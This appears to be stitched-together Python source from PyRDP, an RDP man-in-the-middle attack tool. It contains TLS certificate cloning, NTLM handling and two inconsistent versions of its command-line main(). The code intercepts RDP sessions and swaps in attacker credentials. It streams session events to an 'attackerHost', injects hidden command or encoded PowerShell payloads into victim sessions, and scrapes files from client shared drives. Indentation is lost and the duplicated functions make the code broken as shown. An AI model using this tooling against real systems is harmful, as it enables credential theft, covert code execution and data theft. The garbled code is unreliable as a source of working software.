def doClientTls(self):
cert = self.server.tcp.transport.getPeerCertificate()
if not cert:
# Wait for server certificate
reactor.callLater(1, self.doClientTls)
# Clone certificate if necessary.
if self.certs:
privKey, certFile = self.certs.lookup(cert)
contextForClient = ServerTLSContext(privKey, certFile)
else:
# No automated certificate cloning. Use the specified certificate.
contextForClient = ServerTLSContext(
self.config.privateKeyFileName,
self.config.certificateFileName)
# Establish TLS tunnel with the client
self.onTlsReady()
self.client.tcp.startTLS(contextForClient)
self.onTlsReady = None
# Add unknown packet handlers.
ntlmSSPState = NTLMSSPState()
self.client.segmentation.addObserver(
NLAHandler(self.server.tcp, ntlmSSPState, self.getLog("ntlmssp")))
self.server.segmentation.addObserver(
NLAHandler(self.client.tcp, ntlmSSPState, self.getLog("ntlmssp")))
def validateKeyAndCertificate(private_key: str,
certificate: str) -> Tuple[str, str]:
if (private_key is None) != (certificate is None):
sys.stderr.write(
"You must provide both the private key and the certificate")
sys.exit(1)
if private_key is None:
# Certificates will be generated automatically.
return None, None
else:
key, cert = private_key, certificate
try:
# Check if OpenSSL accepts the private key and certificate.
ServerTLSContext(key, cert)
except OpenSSL.SSL.Error as error:
from pyrdp.logging import log
log.error(
"An error occurred when creating the server TLS context. " +
"There may be a problem with your private key or certificate (e.g: signature algorithm too weak). "
+ "Here is the exception: %(error)s", {"error": error})
sys.exit(1)
return key, cert
def startTLS(self):
"""
Execute a startTLS on both the client and server side.
"""
contextForClient = ServerTLSContext(self.config.privateKeyFileName, self.config.certificateFileName)
contextForServer = ClientTLSContext()
self.client.tcp.startTLS(contextForClient)
self.server.tcp.startTLS(contextForServer)
def onConnectionConfirm(self, _):
# X224 Response
protocols = NegotiationProtocols.SSL if self.originalNegotiationPDU.tlsSupported else NegotiationProtocols.NONE
parser = NegotiationResponseParser()
payload = parser.write(
NegotiationResponsePDU(NegotiationType.TYPE_RDP_NEG_RSP, 0x00,
protocols))
self.x224.sendConnectionConfirm(payload, source=0x1234)
if self.originalNegotiationPDU.tlsSupported:
self.tcp.startTLS(
ServerTLSContext(privateKeyFileName=self.privateKeyFileName,
certificateFileName=self.certificateFileName))
self.useTLS = True
def main():
parser = argparse.ArgumentParser()
parser.add_argument(
"target",
help="IP:port of the target RDP machine (ex: 192.168.1.10:3390)")
parser.add_argument("-l",
"--listen",
help="Port number to listen on (default: 3389)",
default=3389)
parser.add_argument("-o",
"--output",
help="Output folder",
default="pyrdp_output")
parser.add_argument(
"-i",
"--destination-ip",
help=
"Destination IP address of the PyRDP player.If not specified, RDP events are not sent over the network."
)
parser.add_argument(
"-d",
"--destination-port",
help="Listening port of the PyRDP player (default: 3000).",
default=3000)
parser.add_argument("-k",
"--private-key",
help="Path to private key (for SSL)")
parser.add_argument("-c",
"--certificate",
help="Path to certificate (for SSL)")
parser.add_argument(
"-n",
"--nla",
help="For NLA client authentication (need to provide credentials)",
action="store_true")
parser.add_argument(
"-u",
"--username",
help="Username that will replace the client's username",
default=None)
parser.add_argument(
"-p",
"--password",
help="Password that will replace the client's password",
default=None)
parser.add_argument(
"-L",
"--log-level",
help="Console logging level. Logs saved to file are always verbose.",
default="INFO",
choices=["INFO", "DEBUG", "WARNING", "ERROR", "CRITICAL"])
parser.add_argument(
"-F",
"--log-filter",
help="Only show logs from this logger name (accepts '*' wildcards)",
default="")
parser.add_argument(
"-s",
"--sensor-id",
help=
"Sensor ID (to differentiate multiple instances of the MITM where logs are aggregated at one place)",
default="PyRDP")
parser.add_argument("--payload",
help="Command to run automatically upon connection",
default=None)
parser.add_argument(
"--payload-powershell",
help="PowerShell command to run automatically upon connection",
default=None)
parser.add_argument(
"--payload-powershell-file",
help=
"PowerShell script to run automatically upon connection (as -EncodedCommand)",
default=None)
parser.add_argument(
"--payload-delay",
help=
"Time to wait after a new connection before sending the payload, in milliseconds",
default=None)
parser.add_argument(
"--payload-duration",
help=
"Amount of time for which input / output should be dropped, in milliseconds. This can be used to hide the payload screen.",
default=None)
parser.add_argument("--crawl",
help="Enable automatic shared drive scraping",
action="store_true")
parser.add_argument(
"--crawler-match-file",
help=
"File to be used by the crawler to chose what to download when scraping the client shared drives.",
default=None)
parser.add_argument(
"--crawler-ignore-file",
help=
"File to be used by the crawler to chose what folders to avoid when scraping the client shared drives.",
default=None)
parser.add_argument("--no-replay",
help="Disable replay recording",
action="store_true")
args = parser.parse_args()
outDir = Path(args.output)
outDir.mkdir(exist_ok=True)
logLevel = getattr(logging, args.log_level)
prepareLoggers(logLevel, args.log_filter, args.sensor_id, outDir)
pyrdpLogger = logging.getLogger(LOGGER_NAMES.MITM)
target = args.target
if ":" in target:
targetHost = target[:target.index(":")]
targetPort = int(target[target.index(":") + 1:])
else:
targetHost = target
targetPort = 3389
if (args.private_key is None) != (args.certificate is None):
pyrdpLogger.error(
"You must provide both the private key and the certificate")
sys.exit(1)
elif args.private_key is None:
key, certificate = getSSLPaths()
handleKeyAndCertificate(key, certificate)
else:
key, certificate = args.private_key, args.certificate
listenPort = int(args.listen)
config = MITMConfig()
config.targetHost = targetHost
config.targetPort = targetPort
config.privateKeyFileName = key
config.certificateFileName = certificate
config.attackerHost = args.destination_ip
config.attackerPort = int(args.destination_port)
config.replacementUsername = args.username
config.replacementPassword = args.password
config.outDir = outDir
config.enableCrawler = args.crawl
config.crawlerMatchFileName = args.crawler_match_file
config.crawlerIgnoreFileName = args.crawler_ignore_file
config.recordReplays = not args.no_replay
payload = None
powershell = None
if int(args.payload is not None) + int(
args.payload_powershell is not None) + int(
args.payload_powershell_file is not None) > 1:
pyrdpLogger.error(
"Only one of --payload, --payload-powershell and --payload-powershell-file may be supplied."
)
sys.exit(1)
if args.payload is not None:
payload = args.payload
pyrdpLogger.info("Using payload: %(payload)s",
{"payload": args.payload})
elif args.payload_powershell is not None:
powershell = args.payload_powershell
pyrdpLogger.info("Using powershell payload: %(payload)s",
{"payload": args.payload_powershell})
elif args.payload_powershell_file is not None:
if not os.path.exists(args.payload_powershell_file):
pyrdpLogger.error("Powershell file %(path)s does not exist.",
{"path": args.payload_powershell_file})
sys.exit(1)
try:
with open(args.payload_powershell_file, "r") as f:
powershell = f.read()
except IOError as e:
pyrdpLogger.error(
"Error when trying to read powershell file: %(error)s",
{"error": e})
sys.exit(1)
pyrdpLogger.info("Using payload from powershell file: %(path)s",
{"path": args.payload_powershell_file})
if powershell is not None:
payload = "powershell -EncodedCommand " + b64encode(
powershell.encode("utf-16le")).decode()
if payload is not None:
if args.payload_delay is None:
pyrdpLogger.error(
"--payload-delay must be provided if a payload is provided.")
sys.exit(1)
if args.payload_duration is None:
pyrdpLogger.error(
"--payload-duration must be provided if a payload is provided."
)
sys.exit(1)
try:
config.payloadDelay = int(args.payload_delay)
except ValueError:
pyrdpLogger.error(
"Invalid payload delay. Payload delay must be an integral number of milliseconds."
)
sys.exit(1)
if config.payloadDelay < 0:
pyrdpLogger.error("Payload delay must not be negative.")
sys.exit(1)
if config.payloadDelay < 1000:
pyrdpLogger.warning(
"You have provided a payload delay of less than 1 second. We recommend you use a slightly longer delay to make sure it runs properly."
)
try:
config.payloadDuration = int(args.payload_duration)
except ValueError:
pyrdpLogger.error(
"Invalid payload duration. Payload duration must be an integral number of milliseconds."
)
sys.exit(1)
if config.payloadDuration < 0:
pyrdpLogger.error("Payload duration must not be negative.")
sys.exit(1)
config.payload = payload
elif args.payload_delay is not None:
pyrdpLogger.error(
"--payload-delay was provided but no payload was set.")
sys.exit(1)
try:
# Check if OpenSSL accepts the private key and certificate.
ServerTLSContext(config.privateKeyFileName, config.certificateFileName)
except OpenSSL.SSL.Error as error:
log.error(
"An error occurred when creating the server TLS context. " +
"There may be a problem with your private key or certificate (e.g: signature algorithm too weak). "
+ "Here is the exception: %(error)s", {"error": error})
sys.exit(1)
logConfiguration(config)
reactor.listenTCP(listenPort, MITMServerFactory(config))
pyrdpLogger.info("MITM Server listening on port %(port)d",
{"port": listenPort})
reactor.run()
pyrdpLogger.info("MITM terminated")
logConfiguration(config)
def main():
parser = argparse.ArgumentParser()
parser.add_argument("target", help="IP:port of the target RDP machine (ex: 192.168.1.10:3390)")
parser.add_argument("-l", "--listen", help="Port number to listen on (default: 3389)", default=3389)
parser.add_argument("-o", "--output", help="Output folder", default="pyrdp_output")
parser.add_argument("-i", "--destination-ip", help="Destination IP address of the PyRDP player.If not specified, RDP events are not sent over the network.")
parser.add_argument("-d", "--destination-port", help="Listening port of the PyRDP player (default: 3000).", default=3000)
parser.add_argument("-k", "--private-key", help="Path to private key (for SSL)")
parser.add_argument("-c", "--certificate", help="Path to certificate (for SSL)")
parser.add_argument("-n", "--nla", help="For NLA client authentication (need to provide credentials)", action="store_true")
parser.add_argument("-u", "--username", help="Username that will replace the client's username", default=None)
parser.add_argument("-p", "--password", help="Password that will replace the client's password", default=None)
parser.add_argument("-L", "--log-level", help="Console logging level. Logs saved to file are always verbose.", default="INFO", choices=["INFO", "DEBUG", "WARNING", "ERROR", "CRITICAL"])
parser.add_argument("-F", "--log-filter", help="Only show logs from this logger name (accepts '*' wildcards)", default="")
parser.add_argument("-s", "--sensor-id", help="Sensor ID (to differentiate multiple instances of the MITM where logs are aggregated at one place)", default="PyRDP")
parser.add_argument("--no-replay", help="Disable replay recording", action="store_true")
args = parser.parse_args()
outDir = Path(args.output)
outDir.mkdir(exist_ok = True)
logLevel = getattr(logging, args.log_level)
prepareLoggers(logLevel, args.log_filter, args.sensor_id, outDir)
pyrdpLogger = logging.getLogger(LOGGER_NAMES.MITM)
target = args.target
if ":" in target:
targetHost = target[: target.index(":")]
targetPort = int(target[target.index(":") + 1:])
else:
targetHost = target
targetPort = 3389
if (args.private_key is None) != (args.certificate is None):
pyrdpLogger.error("You must provide both the private key and the certificate")
sys.exit(1)
elif args.private_key is None:
key, certificate = getSSLPaths()
handleKeyAndCertificate(key, certificate)
else:
key, certificate = args.private_key, args.certificate
listenPort = int(args.listen)
config = MITMConfig()
config.targetHost = targetHost
config.targetPort = targetPort
config.privateKeyFileName = key
config.certificateFileName = certificate
config.attackerHost = args.destination_ip
config.attackerPort = int(args.destination_port)
config.replacementUsername = args.username
config.replacementPassword = args.password
config.outDir = outDir
config.recordReplays = not args.no_replay
try:
# Check if OpenSSL accepts the private key and certificate.
ServerTLSContext(config.privateKeyFileName, config.certificateFileName)
except OpenSSL.SSL.Error as error:
log.error(
"An error occurred when creating the server TLS context. " +
"There may be a problem with your private key or certificate (e.g: signature algorithm too weak). " +
"Here is the exception: %(error)s",
{"error": error}
)
sys.exit(1)
logConfiguration(config)
reactor.listenTCP(listenPort, MITMServerFactory(config))
pyrdpLogger.info("MITM Server listening on port %(port)d", {"port": listenPort})
reactor.run()
pyrdpLogger.info("MITM terminated")
logConfiguration(config)
